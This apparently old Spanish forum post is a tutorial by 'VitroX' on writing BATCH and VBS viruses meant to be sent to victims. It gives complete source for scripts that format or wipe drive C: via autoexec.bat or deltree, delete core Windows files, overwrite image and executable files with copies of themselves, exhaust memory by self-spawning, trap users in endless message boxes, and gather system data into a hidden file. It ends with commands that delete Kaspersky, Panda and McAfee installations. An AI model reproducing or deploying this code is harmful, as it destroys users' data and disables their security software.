Manual de Virus BATCH y VBS (By VitroX)

Wenas comunidad!
Usmeando por mis dvd de respaldo viejos de mi ordenador, encontré un manualsillo que había escrito hace bastante, se trata de los virus BAT o BATCH y VBS, que son poderosos si se los usa con inteligencia.

Aqui se los dejo!, que lo disfruten -

PARTE UNO:

Citación :

Welcome to virus world, en este manual aprenderás a programar virus, los lenguajes que se estudiaran son BATCH y VBS, estos virus se ejecutan en forma lineal, osea el procesador leerá el fichero como si este sería una carta, de arriba para abajo.
Bueno vamos a empezar, ahora estudiaremos los virus, os explicaré su funcionamiento, modo de ocultación (Stealth), técnicas, ETC, del mejor modo que me parece ami, por medio de ejemplos y virus de la web.
Bueno para programar estos virus no nesecitamos de instrumentación especial ni nada parecido, solo nesecitamos algún editor de ASCII, como puede ser en Windows El Block De Notas o de Ms-Dos el programa Edit.com, para abrir El blok de notas tipeamos en el Prompr Notepad y listo, para abrir Edit entramos en el Prompt de DOS y escribimos Edit!.
Los virus programados En Batch ya son muy viejos, pero al igual que los VBS, la mayoria son indetectables por AVG, Norton, Kapersky, ETC ! -
Los virus BATCH se ejecutan en la consola de DOS, osea, estos virus pueden hacer todo lo que se pueda hacer en el PROMPT de DOS solo que de modo automático!.
Ahora veremos primero todos los virus BATCH, y luego empezaremos con los VBS (son muchos más faciles -

Bueno vamos a empezar con un virus simple que programe con mis colegas CamaroX y Maxi (Vitrox.Iceberg05):

Rem Do Not Edit File - Danger Files - By ("-" 'Vitrox' "-")
Rem Vitrox.IceBerg05
echo off
cls
@echo.echo By Vitrox - Vitrox.IceBerg05.>C:\autoexec.bat
@echo.format c: /q /autotest>>C:\autoexec.bat
del file.bat

Estas lineas conforman un virus bastante dañino lo que hace es formatear el Disco al reinciar la máquina, Expliquemos el código, la primera linea deja un comentario del autor, REM, el comando REM permite que el usuario especifique un comentario sobre el archivo, este comentario no modifica las acciones del virus, el comentario que puso el autor dicen "No modifique este archivo - Peligro En Ficheros - Por VitroX (Yo . Abajo nos encontramos con otro comentario este comentario comenta el nombre dle virus, en este caso Vitrox.Iceberg05.
A continuación empieza el código principal del virus, el maligno !!! :@ !
Nos encontramos con la linea Echo Off, esta linea lo que hace es ocultar los procesos internos del virus para que no se muestren en pantalla, xD, cuando el virus esta trabajando sobre su código malicioso (Destruyendo el Sistema) - suelen aparecer palabras en pantalla como por ej. "C:\windows\clickme.bat>eliminando Windows", cuando el usuario mira esto imediatamente sabe que el archivo esta dañando el sistema, en cambio si escribimos siempre este comando en la cabeza del archivo el usuario no verá que es lo que esta haciendo el virus exactamente, y nosotros podemos engañarlo !!
Luego aparece CLS este es un comando que elimina la pantalla actual, osea, todo lo que hay arriba de CLS (echo Off) no se verá en pantalla.
Ahora la primera parte del código malicioso, @echo.echo By Vitrox - Vitrox.IceBerg05.>C:\autoexec.bat, esta instrucción lo que hace es agregar una linea al AutoExec.Bat (archivo que se ejcuta en el pOsT del sistema), entonces le inserta un comando que produzca maldad en el sistema al reiniciar la máquina, vamos por parte, @echo.echo By Vitrox - Vitrox.IceBerg05.>, el comando esto hace que agregar una linea al autoexec.bat, agrega 'echo By Vitrox - Vitrox.IceBerg05.', al principio del autoexec.bat, Echo sirve para que muestre el mensaje "Bi Vitrox - Vi...." mientras ejecuta la segunda linea., Ahora nos encontramos con ">C:\autoexec.bat", el signo '>' quiere decir "Enviar a..." y luego ponemos a que archivo queremos mandarle todo lo que esta antes, el mensaje al autoexec.bat.
Después nos encontramos con el cófigo malicoso central "format c: /q /autotest>>C:\autoexec.bat", Format es un comando externo que se encuentra en el directorio de Windows que sirve para formatear discos, Format C: /Q /AUTOTEST, Format C:, Formatear la Unidad C:\, después vemos parametros /Q /AUTOTEST, /Q le dice a format que formatee el disco en modo Rápido (Solo Borrar), de modo que el usuario no tenga tiempo de reiniciar el equipo para que format actue, pero si dejamos el código hasta aka nomás (Format C:\ /q) este preguntará "Desea Formatear La Unidad C:?", Nosotros los Hackers no queremos que esto suceda por que ya es más que ovbio que el usuario respondera que No, Pués compruebenlo ustedes mismos, Hagan click en inicio/ejecutar y escriban Command.com, luego esbriban Format C: /q, verán que Format preguntará si estamos seguros:

ADVERTENCIA: SE VAN A PERDER TODOS LOS DATOS
EN EL DISCO FIJO DE LA UNIDAD C.
¿Desea continuar con el formato (S/N)?

Bueno, entonces el autor decidio agregar un parametro, /AutoTest, este paramétro lo que hace es no preguntar al usuario si esta seguro de formatear de modo que el disco se formatee sin previo aviso.
Bueno, luego nos encontramos con el comando "Del", Delete, este comando elimina archivos individuales, entonces Del File.Bat, esta linea elimina el archivo File.Bat, osea, se elimina el mismo, si deseamos mandar este virus lo mandemos con el nombre de File, o si le vamos a poner otro nombre, por ej. Clickme, recordemos cambiar esta linea, Quedaria Así "del ClickMe.bat" ¿OK?

Bueno espero que hayas entendido bien este virus, Si es la primera vez que leyes este manual, estoy seguro que no lo entendiste xDDDD, no es que cuesta asimilarse a un nuevo lenguaje, te recomiendo que lo volvas a leer si es nesesario, leelo 3 ó 4 veces para que te quede bien clarito, usa los códigos y crea otro ejemplos para que quede bien claro, pero entendelo bien por que esto es como la Matemática, si no sabes Restar, ovbiamente no sabes Dividir !.

Bueno, ¿Que? .. ¿En Serio? - ¿Ya estais empezando a crear tus propios virus?, Bueno felicidades !!! :S
Empezemos con otro bichito!, (Vitrox.Cronos05):

Rem Do Not Edit File - Danger Files - By ("-" 'Vitrox' "-")
Rem Vitrox.Cronos05
Echo Off
Cls
Deltree /y C:\
Del File.bat

Este virus elimina todo el Disco C:\.
Bueno a las dos primeras lineas ya las sabeis verdad? Pos si no las sabes vuelve al prinipio !, Ahora Echo Off Y CLS, Ya lo hemos visto antes recuerdas? . Echo Off, para que no muestre los procesos en pantalla y CLS borra los canales anteriores, Lo nuevo "Deltree /y C:\", Deltree es un comando externo que sirve para eliminar carpetas o unidades, bueno en este caso esta tratando de eliminar una unidad (C:\) pero antes nos encontramos con un parametro /Y, este lo que hace es que el programa no pregunte ¿Esta Seguro?, luego nos encontramos con C:\, esta es una especificación de una unidad, el virus elimina todo lo que hay en C:\.
Finalmente se elimina a el mismo. Fin !!!.

¿Y ya empezamos a entender como es este lenguaje? ... ¿viejo pero eficiente no? ... ¿xD? -

Ahora voy a enseñar un bicho que no es muy dañino, pero si molesto, es un archivo que satura la Memoria, algo parecido al OverFlow, lo que hace es abrirse asimismo muchas veces (3.000), se estima que en una máquina de 128MB de RAM cuando la ventana se ejecute unas 220 veces deja de responder, la cuestion es que a la victima a la que se le enviamos, demos por hecho que la máquina se le va a colgar safando solamente reiniciandola, en caso que la víctima intente cerrar una ventana 100 más se ejcutan al instante empeorando la situación, según unos estudios de CamaroX solo una máquina de 972MB de RAM con mucha suerte resistiría este bicho, Bueno vamos al Código; el virus se llama Vitrox.Crazyb05: (Muy Simple )

Rem Do Not Edit File - Danger Files - By ("-" 'Vitrox' "-")
Rem Vitrox.Crazyw05
Echo Off
CLS
Start file.bat
Start file.bat
Start file.bat
del file.bat

Descartando las 4 primeras linas, nos encontramos con el comando Start (open), este comando lo que hace es abrir archivos, en este caso, seguro que ya nos dimos cuenta, el comando abre el mismo virus muchas veces, siempre hay que acordarse de que file.bat es el nombre del archivo cuando lo abrimos, bueno, pero la tribuna estará pensando, no, !aka hay un Bug!, como si al fnal se elimina (del File.bat) a si mismo, ¿como es que hace para seguirse ejecutando?, pues facil !! se almacena en memoria xD!. Finisher !....

Bueno ahora vamos a ver un virus que combina dos lenguajes en uno, es como si fuera uno el crio y el otro el patrón, en este caso el BAT va a ser el patrón y el VBS el crio, por que este bicho lo vemos como un Batch que va a parir un VBS, por que el BACTH crea un VBS y finalmente lo ejecuta!!. Bueno estaos hablando de Vitrox.Titan05:

Rem Do Not Edit File - Danger Files - By ("-" 'Vitrox' "-")
Rem Vitrox.Titan05
echo. do>Titan.vbs
echo. Msgbox "Infected To Vitrox.Titan05">>Titan.vbs
echo. loop>>>Titan.vbs
Start Titan.vbs
cls

Este virus ejecuta una ventana Visual en windows y se niega a cerrarse infinitamente, osea, una ventana estorba el trabajo y no se puede cerrar, solo hay un modo de cerrarla, quien sabe, jaj ni yo que soy el autor sé !! jaja, bueno pero hay una que si funciona (CTRL+SUPR+ALT) no jajaj tampoco funciona, bueno si presionamos dos o tres veces esta combinación, si, si funciona por que se reinicia la PC.
Bueno descartamos las dos primeras lineas, y nos encontramos con ===>

echo. do>Titan.vbs
echo. Msgbox "Infected To Vitrox.Titan05">>Titan.vbs
echo. loop>>>Titan.vbs
Como ya sabemos '>' quiere decir enviar a..., bueno entonces enviamos DO a la primera linea de Titan.Vbs, un archivo que
se crea automaticamente, cuando DOS ve la solicitud '>', despues agrega a la segunda linea del archivo
"Msgbox "Infected To Vitrox.Titan05", y finalmente envia a la tercera linea Loop. De este modo el Batch creo un bicho VBS externo, el bicho que quedó formado en VBS inicia una ventana que no se puede cerrar, pero sigamos viendo que es lo que hace el BATCH "Start Titan.VBS", ejecuta el virus VBS finalizado.
El código del VBS quedó asi:

Do
MsgBox "Infected To Vitrox.Titan05"
Loop

Estos comandos son de VBS, si programamos en BATCh y ponemos estos códigos, el lenguaje BATCH no los reconoce! por qeu son comandos del VBS (a los virus VBS los veremos después de ver todos los BATCH, jaja así que te dejaré con la intrigia de los comandos "Do,Loop,Msgbox", Pasiencia después los explico bien Lindito !.


Bueno, ahora vamos a ver un virus bastante inteligente, pero creo que no lo debemos llamar virus, mejor lo llamemos Troyano xD, por que lo que hace es robar información de la PC y almacenarla en un archivo encriptado ! xDDD, este tipo de bicho es muy divertido programarlo ya que además de ser ingenioso a la hora de programar el virus, debes tener muchos conocimientos sobre el sistema operativo Güindos !.
Este virus roba todo lo que es la información dle NetStat, Directorios del C:\ y C:\windows, Información sobre la Memoria, su uso, Archivos Autoexec.bat y Win.ini, y finalmente la versión del Windows.

Veamos el código de Vitrox.Centauro05:

Rem Do Not Edit File - Danger Files - By ("-" 'Vitrox' "-")
Rem Vitrox.Centauro05

echo off
cls
md %windir%\system\Centauro
netstat>%windir%\system\Centauro\1.C
netstat /a>%windir%\system\Centauro\2.E
netstat /s>%windir%\system\Centauro\3.N
dir c:>%windir%\system\Centauro\4.T
dir C:\windows>%windir%\system\Centauro\5.A
mem>%windir%\system\Centauro\6.U
copy C:\autoexec.bat %windir%\system\Centauro\7.R
copy %windir%\win.ini %windir%\system\Centauro\8.O
ver>%windir%\system\Centauro\9.S
cls
copy %windir%\system\Centauro\1.C+%windir%\system\Centauro\2.E+%windir%\system\Centauro\3.N+%windir%\system\Centauro\4.T+%windir%\system\Centauro\5.A+%windir%\system\Centauro\6.U+%windir%\system\Centauro\7.R+%windir%\system\Centauro\8.O+%windir%\system\Centauro\9.S %windir%\CentauroEnd.Exe
cls
deltree /y %windir%\system\centauro
cls
del file.bat

Citación :

Bueno, este virus es bastante complicado, analizaremos su código paso a paso, a Echo Off y CLS, ya lo tenemos que descartar.
Nos encontramos con MD %windir%\system\Centauro, MD es un comando interno que se encarga de crear carpetas, en este caso se ha especificado que se cree una carpeta en %windir%\system\centauro, bueno esta es una especificación al directorio, %windir%, Directorio de Windows, el autor desidio especificar el directorio de Windows de esta forma ya que muchas veces la victima no instala windows en su lugar Default (C:\Windows), entonces para no correr riesgo, el virus le dice al procesador que busque el sistema en su ubicación actual, y que luego siga en \System\centauro, Centauro es la carpeta que va a crear en la carpeta system. Entonces esta linea lo que hace es crear una carpeta en la dirección especificada.
Ahora nos encontramos con las lineas de "robación de información", Netstat muestra las IP'S actuales. 'NetStat /a' (Recordemos que '>' es "Enviar A....", ).
Netstat es un programa externo que es el que muestra información sobre los puertos abiertos, conexiones activas, osea, depende el parametro que se afirma. En este caso /A, esto quiere decir que le pide que los puertos abiertos y almacenan el resultado en el archivo %windir%\system\Centauro\1.C, 1.C, según se especifica después de '>' -
Luego nos encontramos con Netstat /S, la afirmación /S especifica que se muestren las conexiones activas y procesamientos de la RED.
Ahora nos vamos a encontrar con dos comandos internos "DIR" 'Directorio'- Muestra un directorio, luego nos encontramos con C:\ y C:\windows, almacena la información de los directorios especificados en el lugar especificado '>' lo que sigue después.
Ahora un comando internet "MEM" 'Memoria' Muestra la memoria con la que cuenta el sistema y las aplicaciones que estan corriendo, a esta información la almacena en el lugar especificado después de '>'.
Ahora nos encontramos con 'Copy' - Copiar - vemos que se especifica que se copien los archivos Autoexec.bat (ubicado en la unidad C:) y que se copie el archivo Win.ini (ubicado en el directorio Windows, A... el lugar que dice al lado.
Finalmente nos encontramos con Ver comando externo, que muestra laversión del sistema, y luego vemos '>' que imprime en el archivo especificado.
Podemos aver notado hasta ahora que toda la información se esta almacenando en los archivos (1.C-2.E.-3.N) Hasta formar la palabra Centauro, bueno Ahora nos encontramos con CLS... Demonios!! vamos directamente a lo nuevo, COPY bueno nos volvemos a encontrar con COPY que es el que copia archivos, solo que en este caso va a copiar todos los archivos en uno, osea los va a unir, podemos ver en el código: "%windir%\system\Centauro\1.C+%windir%\system\Centauro\2.E+%windir%\system\Centauro\3.N+%windir%\system\Centauro\4.T+%windir%\system\Centauro\5.A+%windir%\system\Centauro\6.U+%windir%\system\Centauro\7.R+%windir%\system\Centauro\8.O+%windir%\system\Centauro\9.S %windir%\CentauroEnd.Exe "
Como copia los archivos que anteriormente creo para robar la información, el signo '+', especifica "Unir", vemos como une cada uno de los archivos, finalmente guarda todo en CentauroEnd.exe en el Directorio de Windows, ya debes estar capacitado para buscar la forma de que envie la Info a tu email, piensa en outlok! -
Ahora nos encontramos con el veterano código Deltree, este borra carpetas, vemos que borra la carpeta Centauro donde anteriormente habia trabajado el Virus, lo elimina para que no hayan huellas, finalmente emplea el comando interno para borrarse automáticamente.-

Este virus fue el que más me gusto programar, porque, realmente no lo sé, pero es lindo programar este tipo de virus ya que debemos conocer bien a fondo el sistema, para poder saber en donde almacena determinado tipo de información, Que apuesto que cualquiera que haya leido este manual nunca se le ocurrio que VER.EXE es el archivo que almacena la versión actual de Windows.

Para rematar ya de virus BACTH, vamos a ver el último virus de este lenguaje, (Tribuna = noo!!), jajaj Sii, seguro que ya le empezabas a agarrar la mano a estos virus y estas disgustado por que no hayan más, pero tranqui que seguire poniendo más en la web.
Este virus desconfigura todos los códigos fuente de los archivos de los directorios Windows, Mis Documentos.
Vamos al código, este virus se llama Vitrox.Spider05: !!! xD

Rem Do Not Edit File - Danger Files - By ("-" 'Vitrox' "-")
Rem Vitrox.Spider05
echo off
cls
echo.
attrib %windir%\*.* -h -r -s
attrib %windir%\Desktop\*.* -h -r -s
attrib %windir%\web\*.* -h -r -s
attrib C:\Docume~1\*.* -h -r -s
for %%i in (%windir%\*.bmp,*.gif,*.jpg,*.bat,*.exe) do copy %0 %%i>nul
for %%i in (%windir%\*.gif,*.jpg,*.exe) do ren %%i *.bmp>nul
for %%i in (%windir%\Desktop\*.bmp,*.gif,*.jpg,*.bat,*.exe) do copy %0 %%i>nul
for %%i in (%windir%\Desktop\*.gif,*.jpg) do ren %%i *.bmp>nul
for %%i in (%windir%\WEB\*.bmp,*.gif,*.jpg,*.bat) do copy %0 %%i>nul
for %%i in (%windir%\WEB\*.gif,*.jpg) do ren %%i *.bmp>nul
for %%i in (C:\Docume~1\*.bmp,*.gif,*.jpg,*.bat,*.exe) do copy %0 %%i>nul
for %%i in (C:\Docume~1\*.gif,*.jpg) do ren %%i *.bmp>nul
for %%i in (C:\Mydocu~1\*.bmp,*.gif,*.jpg,*.bat,*.exe) do copy %0 %%i>nul
for %%i in (C:\Mydocu~1\*.gif,*.jpg) do ren %%i *.bmp>nul
echo off>>C:\Autoexec.bat
cls>>C:\Autoexec.bat
echo echo. pc infectada, By vitrox>>C:\Autoexec.bat
cls
del file.bat

Bueno al principio nos encontramos con los comentarios, REM, ya te los debes aber aprendido!, :@, Bueno ahora nos encontramos con Attrib, este comando sirve para cambiarle los atributos a los archivos, que pueden ser y se especifican así:

R Atributo de archivo de sólo lectura.
A Atributo de archivo modificado.
S Atributo de archivo de sistema.
H Atributo de archivo oculto.
Si especificamos - Sacamos el atributo, Si ponemos + ponemos el atriburo, osea, un Ejemplo:
Attrib C:\command.com -h - le estamos sacando el atributo de oculto.

Ahora Nos encontramos con 4 lineas, Attrib, vemos que estas le estan sacan los atributos de oculto, solo lectura y de sistema a los archivos de los directorios '%windir%, %windir%\desktop y %windir%\web (Recordemos que WinDir especifica el directorio actual de Windows., (¿ para que ? ... para poder modificarlos 'el codigo de más adelante muestra esto).
Ahora nos encontramos con el código más dificil del lenguaje BATCH, lee la explicación 5 o 6 veces hasta que te quede bien clarito ¿OK? ... bueno los códigos son:

for %%i in (%windir%\*.bmp,*.gif,*.jpg,*.bat,*.exe) do copy %0 %%i>nul
for %%i in (%windir%\*.gif,*.jpg,*.exe) do ren %%i *.bmp>nul
for %%i in (%windir%\Desktop\*.bmp,*.gif,*.jpg,*.bat,*.exe) do copy %0 %%i>nul
for %%i in (%windir%\Desktop\*.gif,*.jpg) do ren %%i *.bmp>nul
for %%i in (%windir%\WEB\*.bmp,*.gif,*.jpg,*.bat) do copy %0 %%i>nul
for %%i in (%windir%\WEB\*.gif,*.jpg) do ren %%i *.bmp>nul
for %%i in (C:\Docume~1\*.bmp,*.gif,*.jpg,*.bat,*.exe) do copy %0 %%i>nul
for %%i in (C:\Docume~1\*.gif,*.jpg) do ren %%i *.bmp>nul
for %%i in (C:\Mydocu~1\*.bmp,*.gif,*.jpg,*.bat,*.exe) do copy %0 %%i>nul
for %%i in (C:\Mydocu~1\*.gif,*.jpg) do ren %%i *.bmp>nul

For, es un comando que entre otras cosas gestiona los códigos fuentes de los archivos, y su principal razón de busqueda de todos los programadores de virus, es su velocidad para cambiar lo códigos fuente de los archivos, Miren estas pruebas que hice, Comparo la velocidad de modificación del código fuente y la de eliminación de archivos:

Eliminando 4096KB En una AMD/Sempron 2400+ = 1,3 Segundos
Modificación del código fuente de 4096kb = 0.4 Segundos.

Es una leve diferencia pero a la hora de modificar códigos grandes como los que va a modificar este virus es importante.

For - Nos encontramos con %%i, este comando quiere decir "Lo que hay dentro" - "Lo Interno" - Deja en memoria todo lo que tiene dentro el virus, Luego nos encontramos con IN (En en castellano) entonces quedaria "Lo Interno En" (%%i In).
Ahora vemos (%windir%\*.bmp,*.gif,*.jpg,*.bat,*.exe), Aki vemos una dirección de una carpeta y una especificación de extenciones, lo que nos quedaria (For %%i In) '''Lo Interno En (%windir%\*.bmp,*.gif,*.jpg,*.bat,*.exe)''' - entonces copia todo el código del virus en los archivos con extenciones "*.bmp,*.gif,*.jpg,*.bat,*.exe" - del directorio %windir%\ - %windir%\WEB\ - C:\Docume~1\ - x-x.
%0 %%i Esto dice, "y al código lo movemos a todos los archivos que ballan procesando en memoria, >Nul (quiere decir Memoria).

echo off>>C:\Autoexec.bat
cls>>C:\Autoexec.bat
echo echo. pc infectada, By vitrox>>>C:\Autoexec.bat

Agrega unas lineas al Autoexec.bat, ya sabemos como funcionan estas cosas.
Finalmente el prompt llama al código interno para que se autoelimine el virus (DEL file.bat).

BUENO, YA HEMOS TERMINADO CON TODO EL MANUAL DE LOS VIRUS BATCH, ESPERO QUE OS HALLA GUSTADO, DUDAS POSTEEN EN EL GUESTBOOK O AGREGUEN MI EMAIL A SU MSN. VAMOS A COMENZAR CON VBS.
Recordemos que al guardarlos hay que ponerle como extención (VBS).

El lenguaje VBS es igual que el BATCH, se ejecuta el código en forma lineal, como leyendo una carta, solo que VBS tiene un entorno cráfico, por eso viene la palabra de VisualBasicScript.
Primero veremos bicho bastante sencillo, este bicho, ejecutará ventanas que no se pueden cerrar de ninguna forma, si el usuario pone CTRL+ALT+SUPR, tampoco se cierran, se produce LOOP. Este es otro lenguaje, ojo con no equivocarse con los comandos por que ninguno funciona en lenguaje BATCH, solo una exepción, esta esepción es la del comando 'REM'.
Su nombre es Vitrox.Box05, CODIGO ====>

Rem Do Not Edit File - Danger Files - By ("-" 'Vitrox' "-")
Rem Vitrox.Box05
do
Msgbox "Vitrox.Box05"
Msgbox "Esta Ventana No Se Cerrará hasta que reinicies la PC"
Msgbox "Tampoco Se Cerrará Si Presionas CTRL+SUPR+DEL",
Msgbox "Te Recomiendo Que La Reinicies y Listo"
Msgbox "Bueno Preparáte por que ahora el Script comienza de cero"
loop

Citación :

Analizando, el primer comando con el que nos encontramos es REM, al igual que en el lenguaje BATCH este comando sirve para agregar comentarios.
Ahora nos encontramos con la parte principal del virus, el comienzo del Looping. "DO" donde ponemos DO es donde comienza el proceso que se repetirá muchas veces, luego nos encontramos con MSGBOX 'Esto es para poner un mensaje (MSG) en una ventana (BOX), cuando aparezca la ventana aparecerá un boton (default) que dice 'Aceptar'. Cuando el usuario presione Aceptar el sistema pasará a la segunda linea (que también es MSGBOX) entonces volverá a abrir otra caja de diálogo con el mensaje que esta al lado 'Entre las Comillas'. Y así sucesivamente hasta llegar el final del Looping "LOOP" cuando el sistema tenga que
ejecutar esta instrucción, automáticamente volverá a DO y seguirá ejecutando las ventanas y el usuario deberá reiniciar la máquina, Intenta abrir este bicho, no daña el sistema, solo te quebrará la cabeza y deberás reiniciar el sistema.

Bueno ahora vamos con un nuevo virus, este virus lo que hace es agotar la memoria (en una Memoria de 128MB, con un microprocesador Sempron AMD 2400+ - el virus la agotará en 4,5 segundos exactamente). (en una PC de las mismas caracterísitcas con una memoria de 384MB tardará 9 segundos).
¿Produce Overflow? ... No, solo agota la memoria como si fuera un programa común, el modo que emplea es autoejecutarse muchas veces hasta agotar la memoria.
Veamos el código de Vitrox.Crazyv05 =>

Set PV2 = CreateObject ("WScript.Shell")
PV2.Run "crazyv.vbs"
Set PV2 = CreateObject ("WScript.Shell")
PV2.Run "crazyv.vbs"
Set PV2 = CreateObject ("WScript.Shell")
PV2.Run "crazyv.vbs"
Set PV2 = CreateObject ("WScript.Shell")
PV2.Run "crazyv.vbs"
Set PV2 = CreateObject ("WScript.Shell")
PV2.Run "crazyv.vbs"
Set PV2 = CreateObject ("WScript.Shell")
PV2.Run "crazyv.vbs"

Ahora nos encontramos con un virus que usa variables, primero nos encontramos con SET, SET es para declarar variables, luego nos encontramos con el nombre que se le asigno a la variable (PV2), ahora vemos que tipo de proceso usará esta variable en lo que sigue del virus que es "CreateObject, una creación de un objeto, luego encontramos el tipo de variable que se especifico que es Wscript.Shell, este tipo es para abrir archivos archivos.
Ahora entontramos con PV2 que es la variable que se especifico, para la gestión de archivos, y luego encontramos Run (correr) a este comando lo usamos para hacer correr aplicaciones, osea, abrirlas, y en el caso vemos que se va a abrir el mismo archivo, luego el compilador sigue leyendo instrucciones (mientras se ha ejecutado el mismo archivo), y vuelve a definir variables y a seguir abriendose asimismo unas 4 o 5 veces más, mientras se ejecutan unas 5 veces más el otro archivo y otras 5 veces más las instrucciones del segundo patrón de la primera aplicación abierta, y así sucesivamente hasta que aparece "No hay más memoria disponible. xD.

Ahora vamos con otro virus, este ya hará algo dañino irreversible, eliminar archivos indispensables para Windows (Command.com, Win.com, y finalmente la carpeta Windows.
El virus se llama Vitrox.Meduza05, veamos su código --->

On Error Resume Next

Set PV1 = CreateObject("Scripting.FileSystemObject")
PV1.deltefile "C:\command.com"
PV1.deltefile "C:\windows\Win.com"
PV1.deltefolder "C:\windows"

Con lo primero que nos encontramos es con "ON ERROR RESUME NEXT" En inglés seria "Al encontrar una falla, continuar con el comando siguiente", jeje le agregue algunas cosillas para que entendais más. Es, por ej. si le decimos al prcesador que elimine Command.com, y justo ese archivo no esta en el sistema, y no hay modo de eliminarlo el VBS informará al usuario de que ese archivo no esta y el proceso finalizará hay, en cambio agregando esta linea el compilador si encuentra alguna falla sigue ejecutando todos los comandos sin advertir al usario...
Bueno ahora vemos que se especifica la variable Scripting.FileSystemObject, esta es para la gestión de los archivos, Mover, copiar, eliminar, cortas, ETC. En este caso la gestión que se utiliza es Eliminar.
Ahora vemos que el código cita a la variable PV1, y luego le da una orden 'deletefile' eliminar archivo, entre comillas se especifica el archivo a eliminar...
Lego hace lo mismo, y finalmente cita a la variable y le ordena eliminar una carpeta 'deletefolder'.


Final! - El manual ha finalizado espero que os hayas entendido todo, cualquier duda postea en el GuestBook, o agrega mi email a tu MSN (lautaroontivero39@hotmail.com) y Questions!

Bueno ahora mostraré algunos códigos para poder eliminar antivirus, antes de proceder a ejecutar el código malicioso ==>

KASPERSKY:

del/F/Q c:\avp\>nul Esto lo borra todo
del/F/Q c:\avp30\>nul
del/F/Q c:\avpers~1\>nul
del/F/Q c:\kasper~1\>nul
del/F/Q c:\kasper~2\>nul
del/F/Q c:\progra~1\avp\>nul
del/F/Q c:\progra~1\avpers~1\>nul
del/F/Q c:\progra~1\common~1\avpsha~1\>nul
del/F/Q c:\progra~1\kasper~1\>nul
del/F/Q c:\progra~1\kasper~2\>nul


PANDA:

del/F/Q c:\Archivos de programa\Panda Software\Panda Platinum Internet Security\>nul Lo borra todo.
del/F/Q c:\Archivos de programa\Panda Software\Panda Platinum Internet Security\Backup\>nul
del/F/Q c:\Archivos de programa\Panda Software\Panda Platinum Internet Security\Firewall\>nul
del/F/Q c:\Archivos de programa\Panda Software\Panda Platinum Internet Security\PavIcl_Log\>nul
del/F/Q c:\Archivos de programa\Panda Software\Panda Platinum Internet Security\Quarantine\>nul
del/F/Q c:\Archivos de programa\Panda Software\Panda Platinum Internet Security\Tasks\>nul
del/F/Q c:\Archivos de programa\Panda Software\Panda Platinum Internet Security\Tasks\>nul


MCFEE:

del/F/Q C:\Archivos de programa\McAfee\>nul Lo borra todo
del/F/Q C:\Archivos de programa\McAfee\McAfee Shared Components\>nul
del/F/Q C:\Archivos de programa\McAfee\McAfee VirusScan\>nul
del/F/Q C:\Archivos de programa\McAfee\VirusScan Wireless\>nul
del/F/Q C:\Archivos de programa\McAfee\VirusScan Wireless\>nul

Estas lineas funcionan en lenguajes BATCH, JAJAJ!!! Muy buena Info ¿No? ...

Saludos

jaja espectacular
pero los antivirus que onda -- se me hacen que estos virus se detectan al toke-.

un beso